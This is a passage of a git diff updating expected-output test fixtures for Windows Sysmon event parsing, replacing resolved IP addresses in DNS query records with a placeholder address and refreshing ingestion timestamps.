Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -8550,7 +8550,7 @@ "ProcessId": "356", "QueryName": "c.urs.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;" + "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;" }, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": "22", diff --git a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json index c8d43a2cb5d..3ce2456a113 100644 --- a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json @@ -51,12 +51,12 @@ "type": "CNAME" }, { - "data": "23.223.14.67", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.223.14.67" + "89.160.20.156" ] }, "network": { @@ -73,13 +73,13 @@ "go.microsoft.com" ], "ip": [ - "23.223.14.67" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.740999700Z", + "ingested": "2021-12-09T13:50:23.456572100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -147,12 +147,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { @@ -169,13 +169,13 @@ "www.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741007600Z", + "ingested": "2021-12-09T13:50:23.456580900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -253,7 +253,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741013100Z", + "ingested": "2021-12-09T13:50:23.456586700Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T08:14:44.489978500Z'/\u003e\u003cEventRecordID\u003e612\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 08:14:44.489\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-c36f-5eb3-2c07-290000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2184\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\.gvm\\versions\\go1.13.10.windows.amd64\\bin\\go.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\1\\go-build583768550\\b001\\test.test.exe\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=199E1CF5B2250BD515ECCCF4CA686301,IMPHASH=D90D8C7812AEC8DA0FA173AFA1293AB2\u003c/Data\u003e\u003cData Name='IsExecutable'\u003etrue\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -319,17 +319,17 @@ "type": "CNAME" }, { - "data": "23.50.53.192", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.195", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.192", - "23.50.53.195" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -345,14 +345,13 @@ "static-global-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.192", - "23.50.53.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741020600Z", + "ingested": "2021-12-09T13:50:23.456592500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -420,17 +419,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -447,14 +446,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741030Z", + "ingested": "2021-12-09T13:50:23.456598Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -520,7 +518,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741038400Z", + "ingested": "2021-12-09T13:50:23.456603600Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:40.599567200Z'/\u003e\u003cEventRecordID\u003e2682\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:40.589\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 1\u003c/Data\u003e\u003cData Name='Details'\u003eDWORD (0x00000004)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -595,7 +593,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741043100Z", + "ingested": "2021-12-09T13:50:23.456609200Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T07:27:18.722136100Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 07:27:18.722\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-b2b6-5eb3-18ab-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e776\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\LOCAL SERVICE\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\lastalive0.dat\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=115106F5B338C87AE6836D50DD890DE3DA296367\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -665,12 +663,12 @@ "type": "CNAME" }, { - "data": "23.64.104.249", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.64.104.249" + "89.160.20.156" ] }, "network": { @@ -687,13 +685,13 @@ "linkmaker.itunes.apple.com" ], "ip": [ - "23.64.104.249" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741047500Z", + "ingested": "2021-12-09T13:50:23.456616900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 